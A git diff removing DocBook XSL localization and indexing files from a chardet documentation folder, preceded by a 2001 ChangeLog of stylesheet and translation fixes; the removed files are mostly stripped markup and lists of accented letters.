-2001-11-28 Norman Walsh - - * common.xsl: Added punct.honorific parameter - - * l10n.xsl: Removed crufty gentext.xref.text template - -2001-11-15 Norman Walsh - - * common.xsl: Support experimental personname wrapper - -2001-11-14 Norman Walsh - - * .cvsignore, Makefile, l10n.xml: Added Basque - -2001-11-12 Norman Walsh - - * common.xsl: Support well-formed documents, use key() instead of id() - -2001-11-09 Norman Walsh - - * .cvsignore, Makefile, l10n.xml: Added Nynorsk - -2001-11-06 Norman Walsh - - * labels.xsl: Why did I assume sections should always be labelled in articles? - -2001-11-02 Norman Walsh - - * common.xsl: Support FAMILY Given style personal names - -2001-10-30 Norman Walsh - - * .cvsignore, Makefile, l10n.xml: Added Xhosa - -2001-10-16 Norman Walsh - - * table.xsl: Table support improvements - -2001-10-15 Norman Walsh - - * .cvsignore, Makefile, l10n.xml: Added Ukranian - - * table.xsl: Fix calculation of rowsep and colsep; added experimental support for table.borders.with.css in HTML; calculation of alignments needs to be added along the same lines - -2001-10-14 Norman Walsh - - * table.xsl: New file. - -2001-09-25 Norman Walsh - - * common.xsl: Support automatic collation of year ranges in copyright - - * l10n.xsl: Fix gentext.nav.* templates - -2001-09-22 Norman Walsh - - * gentext.xsl: Rewrote substitute-markup to support %p - - * gentext.xsl, labels.xsl: Bug #463033: allow xref to list items (in orderedlists) and varlistentrys - - * titles.xsl: Support title.markup for legal notices - -2001-08-29 Norman Walsh - - * common.xsl: Fix orderedlist numerations - -2001-08-14 Norman Walsh - - * l10n.xsl: Calculation of the dingbat nodeset was simply broken - -2001-08-13 Norman Walsh - - * Makefile: Added stylesheet as a dependency - -2001-08-04 Norman Walsh - - * l10n.dtd: Rename internationalization to i18n, localization to l10n - - * l10n.xml: Rename internationalization to i18n, localization to l10n, add namespace declaration - - * l10n.xsl: Support a local i18n override, rename internationalization to i18n, localization to l10n, add namespace declaration - - * labels.xsl: PartIntros never get a label - -2001-08-01 Norman Walsh - - * gentext.xsl: Pass allow-anchors through properly - - * labels.xsl: Fix question labelling - - * titles.xsl: Output anchors for titles if the titles have ids - -2001-07-31 Robert Stayton - - * l10n.xsl: Reverted the change from [last()] to [1] back to [last()] - because that is the correct code. - - * l10n.xsl: Added code to the "l10n.language" template to fall - back to the two-letter lang code if a longer lang - does not have a .xml localization file. - And it falls back to the default lang if it can't - find that either. - - Also fixed a bug for finding the lang attribute. - It was using the last() function, but in an - ancestor-or-self node set you want the first ancestor - (closest) with a lang value. - - 49c49 - < |ancestor-or-self::*/@xml:lang)[last()]"/> - --- - > |ancestor-or-self::*/@xml:lang)[1]"/> - -2001-07-17 Jirka Kosek - - * common.xsl: Fixed bug #442160. Parameter graphic.default.extension is now used also for and not only for . - -2001-07-08 Norman Walsh - - * gentext.xsl, titles.xsl: Support xref to bridgehead - -2001-07-04 - - * .cvsignore, Makefile, l10n.xml: Added support for Turkish - - * .cvsignore, Makefile, l10n.xml: Added Afrikaans - - * common.xsl, titles.xsl: Bug #429011, fix xref to qandset elements - - * labels.xsl: Bug #426188, fix question/answer labels - -2001-06-21 Norman Walsh - - * common.xsl, gentext.xsl, labels.xsl, titles.xsl: Use common code to calculate step numbers; support xref to procedures and steps; added formal.procedures parameter - -2001-06-20 Norman Walsh - - * l10n.xsl: Xalan debugging; harmless changes - -2001-06-14 Norman Walsh - - * subtitles.xsl: Support subtitle on article - -2001-05-23 Norman Walsh - - * common.xsl: Fix dup. template bug with is.graphic.* - - * gentext.xsl: Workaround article/appendix formatting bug (HACK) - - * labels.xsl: Label appendixes correctly in books and articles - -2001-05-21 Norman Walsh - - * labels.xsl: Tweak for section labels in articles - -2001-05-12 Norman Walsh - - * common.xsl: Added refsect* to the section.level template - -2001-05-04 Norman Walsh - - * .cvsignore, Makefile, l10n.xml: Add Serbian localization - -2001-04-21 Norman Walsh - - * common.xsl: My first crude attempts at support for qandaset - -2001-04-19 Norman Walsh - - * gentext.xsl, titles.xsl: Fix bug #417193, make sure allow-anchors is properly propagated through substitute-markup - -2001-04-18 Norman Walsh - - * titles.xsl: Suppress indexterms in no.anchor.mode - -2001-04-17 Norman Walsh - - * labels.xsl: Move label.from.part parameter into param.xsl; default it to 0 so that chapters and appendixes are numbered monotonically throughout a book by default. Moved param.xsl up in the include list, just for good measure - -2001-04-16 Norman Walsh - - * gentext.xsl: Fix bug in processing of subtitle content - - * labels.xsl: Only label.from.part if there actually is a part - - * titles.xsl: Don't put ulink, link, olink, or xref in titles if anchor's aren't allowed - -2001-04-15 Norman Walsh - - * gentext.xsl: Localize the textonly calculations by creating a object.title.markup.textonly mode - -2001-04-03 Norman Walsh - - * gentext.xsl, labels.xsl, titles.xsl: Fix bug 412487, make XSL-generated callout marks honor callout mark parameters - - * titles.xsl: Restore no.anchor.mode and suppress footnotes in no.anchor.mode - -2001-04-02 Norman Walsh - - * .cvsignore, Makefile: New file. - - * common.xsl, gentext.xsl, l10n.xml, l10n.xsl, labels.xsl, subtitles.xsl, titles.xsl: - New file. - - * gentext.xsl: Commented out debugging messages - - * l10n.dtd: New file. - diff --git a/chardet/docs/docbook/xsl/common/af.xml b/chardet/docs/docbook/xsl/common/af.xml deleted file mode 100644 index 8cdb2c7..0000000 --- a/chardet/docs/docbook/xsl/common/af.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á - Â - â - Ã - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/ar.xml b/chardet/docs/docbook/xsl/common/ar.xml deleted file mode 100644 index 7398cea..0000000 --- a/chardet/docs/docbook/xsl/common/ar.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á - Â - â - Ã - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/autoidx-ng.xsl b/chardet/docs/docbook/xsl/common/autoidx-ng.xsl deleted file mode 100644 index bbf8d19..0000000 --- a/chardet/docs/docbook/xsl/common/autoidx-ng.xsl +++ /dev/null @@ -1,135 +0,0 @@ - - -]> - - - - - - - - - - - - - - - - - - - - - - - - - - - No " - - " localization of index grouping letters exists - - - . - - - ; using "en". - - - - - - - - - - - - - - - - - - - - - - 0 - - - - - - - - - - - - - - - - - - - - - - - - - - - - No " - - " localization of index grouping letters exists - - - . - - - ; using "en". - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/bg.xml b/chardet/docs/docbook/xsl/common/bg.xml deleted file mode 100644 index bf934e9..0000000 --- a/chardet/docs/docbook/xsl/common/bg.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á - Â - â - Ã - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/bn.xml b/chardet/docs/docbook/xsl/common/bn.xml deleted file mode 100644 index bd0e769..0000000 --- a/chardet/docs/docbook/xsl/common/bn.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á - Â - â - Ã - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/ca.xml b/chardet/docs/docbook/xsl/common/ca.xml deleted file mode 100644 index f60a5b4..0000000 --- a/chardet/docs/docbook/xsl/common/ca.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á - Â - â - Ã - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů 